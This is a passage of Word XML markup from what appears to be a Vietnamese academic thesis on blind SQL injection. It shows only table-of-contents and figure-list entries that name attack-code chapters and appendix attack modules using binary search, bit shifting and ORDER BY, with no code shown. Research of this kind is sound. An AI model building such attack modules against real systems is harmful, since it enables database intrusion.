              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</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56" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.</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Xây dựng môi trường thực nghiệm</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374356 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</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57" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.</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Xây dựng mã tấn công sử dụng phương pháp tìm kiếm nhị phân</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374357 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</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58" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng mã tấn công sử dụng phương pháp dịch bit</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374358 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</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59" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng mã tấn công sử dụng phương pháp phân tích thứ tự trả về</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374359 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00D655B3" w:rsidRDefault="00EF433B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459374360" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thử nghiệm và đánh giá kết quả</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374360 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>77</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61" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>KẾT LUẬN</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374361 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</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62" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>TÀI LIỆU THAM KHẢO</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374362 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00D655B3" w:rsidRDefault="00EF433B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459374363" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>PHỤ LỤC</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374363 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</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64" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Module Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374364 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</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65" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Module Blind SQL injection sử dụng tìm kiếm nhị phân</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374365 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</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66" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Module Blind SQL injection sử dụng phép dịch bit</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374366 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00D655B3" w:rsidRDefault="00EF433B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459374367" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Module Blind SQL injection sử dụng Order by</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374367 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00410F30" w:rsidRDefault="00B70950" w:rsidP="0008594E">
          <w:pPr>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00410F30" w:rsidRPr="00410F30" w:rsidRDefault="00410F30" w:rsidP="00410F30">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRPr="00FF76BB" w:rsidRDefault="003E0ED1" w:rsidP="00FF76BB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc459374304"/>
      <w:r w:rsidR="00EE5E6C">
        <w:lastRenderedPageBreak/>
        <w:t>DA</w:t>
      </w:r>
      <w:r w:rsidR="00EE5E6C">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>NH MỤC HÌNH VẼ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00E7327E" w:rsidRDefault="003308DA" w:rsidP="00E7327E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Hình" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc458436413" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>: Mô hình ba lớp đ</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ơ</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>n giản trong ứng dụng web.</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436413 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</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4" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2:Mô hình ứng dụng 4-lớp.</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436414 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</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5" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3: Thông báo lỗi của MSSQL Server</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc458436415 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</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6" w:history="1">
        <w:r w:rsidR="00E7327E" w:rsidRPr="00F203CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4: Lấy thông tin phiên bản MSSQL Server</w:t>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E7327E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
